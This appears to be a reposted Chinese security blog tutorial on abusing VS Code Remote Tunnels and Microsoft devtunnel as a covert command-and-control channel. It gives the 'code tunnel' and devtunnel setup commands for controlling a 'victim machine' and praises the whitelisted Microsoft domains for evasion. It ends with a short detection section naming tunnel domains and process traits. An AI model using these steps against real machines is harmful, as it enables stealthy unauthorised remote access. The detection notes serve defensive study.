[免杀对抗]VSCode还能这样用?

admin 2024年9月24日12:01:07评论19 views字数 1280阅读4分16秒阅读模式

原文首发在:先知社区

https://xz.aliyun.com/t/15616

0x01 当作C2

VStudio Code Remote - Tunnel 扩展允许您通过安全隧道连接到远程计算机,例如台式电脑或虚拟机 (VM)。您可以从任何地方的 VS Code 客户端连接到该计算机,无需 SSH。

说白话:通过 VS Code 远程控制目标机器
查看帮助:code -h(这两个参数都是与开启隧道有关的参数)

[免杀对抗]VSCode还能这样用?

优点
○ 大厂证书,回连域名和 IP 为微软 VS Code,正常开发人员也会使用,可以说是白域名和白 IP
○ HTTPS 加密,执行的命令和回显的数据均为 TLS 加密
○ 操作简便

缺点
○ 受害机器需要能访问 VScode 官网

远程控制

1.受害机器开启 Tunnel

默认受害者安装了 VS Code 的情况

code tunnel

[免杀对抗]VSCode还能这样用?

记住授权码:9222-1A1F
注意:此操作要挂梯子,因为连接的是 VS 的官网

2.GitHub 授权

访问 URL:https://github.com/login/device 登录 GitHub 账户进行授权

[免杀对抗]VSCode还能这样用?

接下来点击同意授权即可

[免杀对抗]VSCode还能这样用?

[免杀对抗]VSCode还能这样用?

此时控制台也出现了连接成功的信息

[免杀对抗]VSCode还能这样用?

3.访问后门地址进行控制

上面连接成功会出现控制的URL:https://vscode.dev/tunnel/desktop-21fnjqm

[免杀对抗]VSCode还能这样用?

左下角出现机器名则表示连接成功!

[免杀对抗]VSCode还能这样用?

4.文件浏览和命令执行

[免杀对抗]VSCode还能这样用?

可以正常读取文件

[免杀对抗]VSCode还能这样用?

写入文件试试

[免杀对抗]VSCode还能这样用?

执行命令也没任何问题

[免杀对抗]VSCode还能这样用?

目标未安装 VSCode

解决方案:下载单文件版本

[免杀对抗]VSCode还能这样用?

[免杀对抗]VSCode还能这样用?

同样可以正常使用

[免杀对抗]VSCode还能这样用?

检测和防御

特征1.控制台有 log 日志

[免杀对抗]VSCode还能这样用?

特征2.外联域名

*.tunnels.api.visualstudio.com
*.devtunnels.ms

特征3.其他特征

固定的进程名:code.exe
参数名:tulnnel
创建进程的行为默认为:cmd.exe 和 powershell.exe
等等

0x02 用作 C2 域前置

1.VPS 下载 devtunnel

wget https://aka.ms/TunnelsCliDownload/linux-x64;mv linux-x64 devtunnel;chmod +x devtunnel

2.开启隧道并认证

./devtunnel user login -g -d

[免杀对抗]VSCode还能这样用?

[免杀对抗]VSCode还能这样用?

3.创建隧道

./devtunnel create -a <隧道名称>
./devtunnel port create -p 8443 --protocol https
./devtunnel host

[免杀对抗]VSCode还能这样用?

此时给出的上线域名:505lmm60-8443.asse.devtunnels.ms

4.连接上线

[免杀对抗]VSCode还能这样用?

上线(由于连接的 vscode,需要挂梯子,不然死活上不了线,坑了我半天)

[免杀对抗]VSCode还能这样用?

参考连接

● https://redsiege.com/blog/2024/04/using-microsoft-dev-tunnels-for-c2-redirection/
● https://www.youtube.com/watch?v=9la5vTerq0o&pp=ygUUY29iYWx0IHN0cmlrZSBiZWFjb24%3D

原文始发于微信公众号(亿人安全):[免杀对抗]VSCode还能这样用?

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月24日12:01:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [免杀对抗]VSCode还能这样用?https://cn-sec.com/archives/3201924.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息